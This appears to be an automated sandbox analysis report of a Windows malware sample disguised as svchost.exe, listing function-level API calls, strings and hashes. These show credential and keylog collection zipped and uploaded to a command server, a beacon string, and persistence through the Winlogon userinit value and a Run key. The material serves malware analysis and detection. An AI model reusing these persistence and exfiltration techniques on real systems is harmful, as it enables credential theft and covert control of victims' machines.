PathAddBackslashA.SHLWAPI(?), ref: 02C8275A

Strings

325b0ba3454dc65e, xrefs: 02C828F8, 02C82A02, 02C82AD2
keylog.txt, xrefs: 02C826A8
-----------------------------, xrefs: 02C828EF
%s%u.zip, xrefs: 02C827E9
passwords.txt, xrefs: 02C8276B
--, xrefs: 02C82B18
Content-Disposition: form-data; name="pcname", xrefs: 02C82960
software\microsoft, xrefs: 02C82BAF
Content-Disposition: form-data; name="file"; filename="report", xrefs: 02C82A6D
C:\Users\user\AppData\Roaming\, xrefs: 02C827E4
-----------------------------, xrefs: 02C829FD, 02C82ACD
DEBUG, xrefs: 02C82793, 02C82B5A
7D2DE6CDa, xrefs: 02C826EB
7d2de689a, xrefs: 02C82BCB
Content-Type: text/plain, xrefs: 02C82A88

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$Backslash$CopyFileFolder
String ID: -----------------------------$%s%u.zip$--$-----------------------------$325b0ba3454dc65e$7D2DE6CDa$7d2de689a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
API String ID: 3190534014-2985065750
Opcode ID: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
Instruction ID: 865299569bd8b8cbb1b101e5ee340d48d98818a7844a4a17295b00d0828f261b
Opcode Fuzzy Hash: e2c056e245c04198f486efb39f8410ec92e6f80c18de7ac40bc212f9070211ba
Instruction Fuzzy Hash: 290249319442D65BDB169F3098A8BFBBBE5FF85308F148584ED869B240DB32DA09C791

Function 02C740F0 Relevance: 86.0, APIs: 35, Strings: 14, Instructions: 267
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000C10,00000000,762335B0,00000000), ref: 02C7410D
HeapAlloc.KERNEL32(00000000), ref: 02C74110
memset.MSVCRT ref: 02C74124
GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C74194
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741A2
HeapValidate.KERNEL32(00000000), ref: 02C741A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C741B2
HeapFree.KERNEL32(00000000), ref: 02C741B5
GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C741CD
HeapAlloc.KERNEL32(00000000), ref: 02C741D0
memset.MSVCRT ref: 02C741E0
GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C741FA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74207
HeapValidate.KERNEL32(00000000), ref: 02C7420A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7421B
HeapFree.KERNEL32(00000000), ref: 02C7421E
GetProcessHeap.KERNEL32(00000008,-00000083), ref: 02C74249
HeapAlloc.KERNEL32(00000000), ref: 02C7424C
memset.MSVCRT ref: 02C74263
htons.WS2_32(?), ref: 02C742D9
htons.WS2_32(?), ref: 02C742EC
_snprintf.MSVCRT ref: 02C74307
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74313
HeapValidate.KERNEL32(00000000), ref: 02C74316
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74323
HeapFree.KERNEL32(00000000), ref: 02C74326
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02C74332
HeapValidate.KERNEL32(00000000), ref: 02C74335
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C74342
HeapFree.KERNEL32(00000000), ref: 02C74345
WriteFile.KERNEL32(00000C00,00000000,00000001,?,00000000), ref: 02C743A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743AB
HeapValidate.KERNEL32(00000000), ref: 02C743AE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C743BB
HeapFree.KERNEL32(00000000), ref: 02C743BE

Strings

FIN_WAIT2, xrefs: 02C7415B
SYN_SENT, xrefs: 02C7413F
TIME_WAIT, xrefs: 02C74177
DELETE_TCB, xrefs: 02C7417E
CLOSING, xrefs: 02C74169
LAST_ACK, xrefs: 02C74170
LISTEN, xrefs: 02C74138
CLOSED, xrefs: 02C74131
TCP%s:%d%s:%d%s, xrefs: 02C74300
CLOSE_WAIT, xrefs: 02C74162
FIN_WAIT1, xrefs: 02C74154
ESTAB, xrefs: 02C7414D
netstat{ProtoLocal addressRemote addressState, xrefs: 02C74268
SYN_RCVD, xrefs: 02C74146

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Allocmemset$Tablehtons$FileWrite_snprintf
String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
API String ID: 3573621883-2402783461
Opcode ID: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
Instruction ID: 6fd2147aa34d27987b0607b3265e8337516b80a64b11be02324dc0ca9855ac84
Opcode Fuzzy Hash: cdf18205eaf4d770cafe0dd934a66c4fea390b45350f0fdebda89808dd7fe703
Instruction Fuzzy Hash: 9D91C7B1E40289ABDB259FA5EC88FAF7F78EF85705F144594E508E7281DB30D504CB61

Function 02C82734 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 467
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C827CA
DeleteFileA.KERNEL32(?), ref: 02C827D7
GetTickCount.KERNEL32 ref: 02C827DD
_snprintf.MSVCRT ref: 02C827FA
VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C82811
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C8282E
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02C8285D
SetFileAttributesA.KERNEL32(?,00000000,?), ref: 02C82878
RemoveDirectoryA.KERNEL32(?), ref: 02C82885

Strings

325b0ba3454dc65e, xrefs: 02C828F8, 02C82A02, 02C82AD2
-----------------------------, xrefs: 02C828EF
%s%u.zip, xrefs: 02C827E9
passwords.txt, xrefs: 02C8276B
--, xrefs: 02C82B18
Content-Disposition: form-data; name="pcname", xrefs: 02C82960
software\microsoft, xrefs: 02C82BAF
Content-Disposition: form-data; name="file"; filename="report", xrefs: 02C82A6D
C:\Users\user\AppData\Roaming\, xrefs: 02C827E4
-----------------------------, xrefs: 02C829FD, 02C82ACD
DEBUG, xrefs: 02C82793, 02C82B5A
7d2de689a, xrefs: 02C82BCB
Content-Type: text/plain, xrefs: 02C82A88

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$AttributesVirtual$AllocBackslashCountDeleteDirectoryFreePathRemoveTick_snprintflstrcpyn
String ID: -----------------------------$%s%u.zip$--$-----------------------------$325b0ba3454dc65e$7d2de689a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt$software\microsoft
API String ID: 1417698165-3315029883
Opcode ID: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
Instruction ID: 5c746aca08dc5a9761cd58d6ee12c124871ebf8dfcb3648c4e6165b6ec53c4f2
Opcode Fuzzy Hash: 96d1b09aead743ab749e9d87d7ed4e3c3599536a2fc97adc4ee112459d75ba1f
Instruction Fuzzy Hash: D8F14A319442D65BDF169F3098ACBFBBBA5FF85308F048584ED869B240DB32DA09C791

Function 02C83620 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 311
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02C83655
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
_snprintf.MSVCRT ref: 02C8378E
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
HeapAlloc.KERNEL32(00000000), ref: 02C8382A
memset.MSVCRT ref: 02C83842
InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
HeapValidate.KERNEL32(00000000), ref: 02C8388C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
HeapFree.KERNEL32(00000000), ref: 02C8389C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
HeapValidate.KERNEL32(00000000), ref: 02C838AD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
HeapFree.KERNEL32(00000000), ref: 02C838BD
GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
CloseHandle.KERNEL32(00000000), ref: 02C838E4

Strings

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
325b0ba3454dc65e, xrefs: 02C83778
POST, xrefs: 02C8371C, 02C8372F
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
GET, xrefs: 02C83712
Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
Referer: http://www.google.com, xrefs: 02C8376B
HTTP/1.0, xrefs: 02C83729

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
String ID: 325b0ba3454dc65e$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 1431876097-3557604321
Opcode ID: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
Instruction ID: 5504d569ebac3d570b88e2c87a30457f6a10eee0940acfc8c6b47d78dcfd1f48
Opcode Fuzzy Hash: 69b162da5366fc839cd22c819ebd10d18e574b30571f986c4605c700850c8126
Instruction Fuzzy Hash: ACA1EB71A402987BEB11AF64DC89FEF776CEF88B19F0046A9F905E7180D7709A14CB61

Function 02C868B0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244
registrymemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02C868DE
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02C86907
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86927
GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02C86944
HeapAlloc.KERNEL32(00000000), ref: 02C8694B
memset.MSVCRT ref: 02C8695F
RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86979
StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02C86981
RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02C86A20
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A2F
HeapValidate.KERNEL32(00000000), ref: 02C86A32
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A3F
HeapFree.KERNEL32(00000000), ref: 02C86A42
RegFlushKey.ADVAPI32(?), ref: 02C86A4C
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02C86A6D
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02C86A9D
RegFlushKey.ADVAPI32(?), ref: 02C86AA7
RegCloseKey.KERNEL32(?), ref: 02C86AB1
IsUserAnAdmin.SHELL32 ref: 02C86AB7
RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02C86AED
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C86AFC
RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02C86B19
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C86B24
RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02C86B47

Strings

userinit, xrefs: 02C86921, 02C86973, 02C86A1A, 02C86A97
C:\Windows\apppatch\svchost.exe, xrefs: 02C868B6, 02C868D9, 02C8697B, 02C869C1, 02C86A73, 02C86A8A, 02C86A8E, 02C86B32
software\microsoft\windows\currentversion\run, xrefs: 02C86A63, 02C86AE3
,, xrefs: 02C8699F
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C868FD, 02C86ACC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 2213373080-1283825033
Opcode ID: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
Instruction ID: 8822c7c67e2016f5214d1eb9464f0d1547cdcdbd9c47378666bae36805e27dd0
Opcode Fuzzy Hash: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
Instruction Fuzzy Hash: C071D971E84245BBEB119B649C49FBBB76CDF84708F208694F941BB280DBB1DA05C7A0

Function 02C75C80 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 248
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02C75CA0

Part of subcall function 02C839C0: memset.MSVCRT ref: 02C839F2
Part of subcall function 02C839C0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
Part of subcall function 02C839C0: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
Part of subcall function 02C839C0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5

calloc.MSVCRT ref: 02C75CE7
exit.MSVCRT ref: 02C75CF6
calloc.MSVCRT ref: 02C75CFF
exit.MSVCRT ref: 02C75D09
calloc.MSVCRT ref: 02C75D27
exit.MSVCRT ref: 02C75D33
calloc.MSVCRT ref: 02C75D3C
exit.MSVCRT ref: 02C75D46
calloc.MSVCRT ref: 02C75D64
exit.MSVCRT ref: 02C75D71
calloc.MSVCRT ref: 02C75D7B
exit.MSVCRT ref: 02C75D86
calloc.MSVCRT ref: 02C75DA9
exit.MSVCRT ref: 02C75DB6
calloc.MSVCRT ref: 02C75DC0
exit.MSVCRT ref: 02C75DCF
_strrev.MSVCRT ref: 02C75E39
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C76406,?), ref: 02C75EFC
HeapValidate.KERNEL32(00000000), ref: 02C75EFF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C75F0C
RtlFreeHeap.NTDLL(00000000), ref: 02C75F0F
PathFileExistsA.SHLWAPI(02C76406,02C76406,/login.php,02C76406,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02C75F1A
SetFileAttributesA.KERNEL32(02C76406,00000000,?,00000000,00000000), ref: 02C75F2B
DeleteFileA.KERNEL32(02C76406,?,00000000,00000000), ref: 02C75F32

Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E

Strings

/login.php, xrefs: 02C75CB1
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C75DDD
10001, xrefs: 02C75DFA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$callocexit$File$Process$memset$FreeHandleInternetOpenValidate$AllocateAttributesCloseConnectCreateDeleteExistsHttpInformationPathReadRequestSizeWrite_strrev
String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
API String ID: 550513112-2761129557
Opcode ID: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
Instruction ID: 0232dead3d0be3a74cf210bb2837edbe1b3ac61b181474ee5f9503a028576102
Opcode Fuzzy Hash: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
Instruction Fuzzy Hash: 76813870E402A5AFEB229F648C84BAFBFB8EF41344F044559ED45A7281D7B5DA04CBE1

Function 02C85590 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 242
memorysleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02C855B1
GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02C855E7
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C855EE
memset.MSVCRT ref: 02C85603
GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02C85612
Sleep.KERNEL32(000001F4), ref: 02C85626
IsUserAnAdmin.SHELL32 ref: 02C8564C
GetTickCount.KERNEL32 ref: 02C8568A
_snprintf.MSVCRT ref: 02C856C6
GetTempPathA.KERNEL32(00000104,?), ref: 02C856DB
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C856F3
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C85702
DeleteFileA.KERNEL32(?), ref: 02C8570F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85771
HeapValidate.KERNEL32(00000000), ref: 02C85778
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85785
HeapFree.KERNEL32(00000000), ref: 02C8578C
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C857DE
HeapValidate.KERNEL32(00000000), ref: 02C857E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C857EE
HeapFree.KERNEL32(00000000), ref: 02C857F1
SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C85800
DeleteFileA.KERNEL32(?), ref: 02C8580D
Sleep.KERNEL32(?,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85851

Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75

Sleep.KERNEL32(00000000,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85873

Strings

id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d, xrefs: 02C856BF
/faq.php, xrefs: 02C857AC
%2b, xrefs: 02C8563C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$memset$Sleep$AdminAttributesCheckConnectionDeleteFreeInternetTempUserValidatelstrcpyn$AliveAllocCacheCountFlushInformationNameNetworkPathResolverTickTimeZone_snprintf
String ID: %2b$/faq.php$id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
API String ID: 3187169398-2843672900
Opcode ID: be2803115a0e9cbeb4c2860de464123b1cd91aff08b2676f9e31f8151721c4ef
Instruction ID: 8833a8bceabfceadb4c51c836d4e23b1a1e0e2c7b996f887b9cde1ca41dd3caf
Opcode Fuzzy Hash: be2803115a0e9cbeb4c2860de464123b1cd91aff08b2676f9e31f8151721c4ef
Instruction Fuzzy Hash: D8812A72E80255ABDB25AB749C48FEA7B69EF84344F45C6D0E905D72C0EB70DA04CBA1

Function 02C83A35 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 174
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
_snprintf.MSVCRT ref: 02C83B38
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
memset.MSVCRT ref: 02C83BF2
InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
HeapValidate.KERNEL32(00000000), ref: 02C83C3C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
HeapFree.KERNEL32(00000000), ref: 02C83C4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
HeapValidate.KERNEL32(00000000), ref: 02C83C5D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
HeapFree.KERNEL32(00000000), ref: 02C83C6D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
CloseHandle.KERNEL32(00000000), ref: 02C83C94
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C83D10
HeapValidate.KERNEL32(00000000), ref: 02C83D13
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83D20
RtlFreeHeap.NTDLL(00000000), ref: 02C83D23
InternetCloseHandle.WININET(00000000), ref: 02C83D2D
